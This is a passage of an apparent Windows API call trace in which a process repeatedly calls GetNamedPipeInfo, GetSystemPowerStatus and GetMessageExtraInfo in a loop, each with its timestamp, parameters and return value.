	[0130.061] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.061] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.061] GetMessageExtraInfo () returned 0x0
	[0130.067] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.073] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.073] GetMessageExtraInfo () returned 0x0
	[0130.073] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.073] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.073] GetMessageExtraInfo () returned 0x0
	[0130.074] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.074] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.074] GetMessageExtraInfo () returned 0x0
	[0130.075] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.075] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.075] GetMessageExtraInfo () returned 0x0
	[0130.075] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.075] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.075] GetMessageExtraInfo () returned 0x0
	[0130.076] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.076] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.076] GetMessageExtraInfo () returned 0x0
	[0130.076] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.076] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.076] GetMessageExtraInfo () returned 0x0
	[0130.076] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.076] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.076] GetMessageExtraInfo () returned 0x0
	[0130.076] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.076] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.076] GetMessageExtraInfo () returned 0x0
	[0130.076] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.076] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.076] GetMessageExtraInfo () returned 0x0
	[0130.076] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.076] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.076] GetMessageExtraInfo () returned 0x0
	[0130.076] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.077] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.077] GetMessageExtraInfo () returned 0x0
	[0130.077] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.077] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.077] GetMessageExtraInfo () returned 0x0
	[0130.077] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.077] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.077] GetMessageExtraInfo () returned 0x0
	[0130.077] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.077] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.077] GetMessageExtraInfo () returned 0x0
	[0130.077] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.077] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.077] GetMessageExtraInfo () returned 0x0
	[0130.077] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.077] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.077] GetMessageExtraInfo () returned 0x0
	[0130.077] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.077] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.077] GetMessageExtraInfo () returned 0x0
	[0130.077] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.077] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.077] GetMessageExtraInfo () returned 0x0
	[0130.077] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.077] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.077] GetMessageExtraInfo () returned 0x0
	[0130.077] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.077] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.077] GetMessageExtraInfo () returned 0x0
	[0130.077] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.077] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.077] GetMessageExtraInfo () returned 0x0
	[0130.077] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.078] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.078] GetMessageExtraInfo () returned 0x0
	[0130.078] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.078] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.078] GetMessageExtraInfo () returned 0x0
	[0130.078] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.078] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.078] GetMessageExtraInfo () returned 0x0
	[0130.078] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.078] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.078] GetMessageExtraInfo () returned 0x0
	[0130.078] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.078] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.078] GetMessageExtraInfo () returned 0x0
	[0130.078] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.078] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.078] GetMessageExtraInfo () returned 0x0
	[0130.078] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.078] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.078] GetMessageExtraInfo () returned 0x0
	[0130.078] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.078] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.078] GetMessageExtraInfo () returned 0x0
	[0130.078] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.078] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.078] GetMessageExtraInfo () returned 0x0
	[0130.078] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.078] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.078] GetMessageExtraInfo () returned 0x0
	[0130.078] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.078] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.078] GetMessageExtraInfo () returned 0x0
	[0130.078] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.078] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.079] GetMessageExtraInfo () returned 0x0
	[0130.079] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.079] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.079] GetMessageExtraInfo () returned 0x0
	[0130.079] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.079] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.079] GetMessageExtraInfo () returned 0x0
	[0130.079] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.079] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.079] GetMessageExtraInfo () returned 0x0
	[0130.079] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.079] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.079] GetMessageExtraInfo () returned 0x0
	[0130.079] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.079] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.079] GetMessageExtraInfo () returned 0x0
	[0130.079] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.079] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.079] GetMessageExtraInfo () returned 0x0
	[0130.079] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.079] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.079] GetMessageExtraInfo () returned 0x0
	[0130.079] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.079] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.079] GetMessageExtraInfo () returned 0x0
	[0130.079] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.079] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.079] GetMessageExtraInfo () returned 0x0
	[0130.079] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.079] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.080] GetMessageExtraInfo () returned 0x0
	[0130.080] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.080] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.080] GetMessageExtraInfo () returned 0x0
	[0130.080] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.080] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.080] GetMessageExtraInfo () returned 0x0
	[0130.080] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.080] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.080] GetMessageExtraInfo () returned 0x0
	[0130.080] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.080] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.080] GetMessageExtraInfo () returned 0x0
	[0130.080] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.080] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.080] GetMessageExtraInfo () returned 0x0
	[0130.080] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.080] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.080] GetMessageExtraInfo () returned 0x0
	[0130.080] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.080] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.080] GetMessageExtraInfo () returned 0x0
	[0130.080] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.080] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.080] GetMessageExtraInfo () returned 0x0
	[0130.080] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.080] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.080] GetMessageExtraInfo () returned 0x0
	[0130.080] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.080] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.080] GetMessageExtraInfo () returned 0x0
	[0130.080] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.080] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.080] GetMessageExtraInfo () returned 0x0
	[0130.080] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.081] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.081] GetMessageExtraInfo () returned 0x0
	[0130.081] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.081] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.081] GetMessageExtraInfo () returned 0x0
	[0130.081] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.081] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.081] GetMessageExtraInfo () returned 0x0
	[0130.081] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.081] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.081] GetMessageExtraInfo () returned 0x0
	[0130.081] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.081] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.081] GetMessageExtraInfo () returned 0x0
	[0130.081] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.081] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.081] GetMessageExtraInfo () returned 0x0
	[0130.081] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.081] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.081] GetMessageExtraInfo () returned 0x0
	[0130.081] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0130.081] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0130.081] GetMessageExtraInfo () returned 0x0
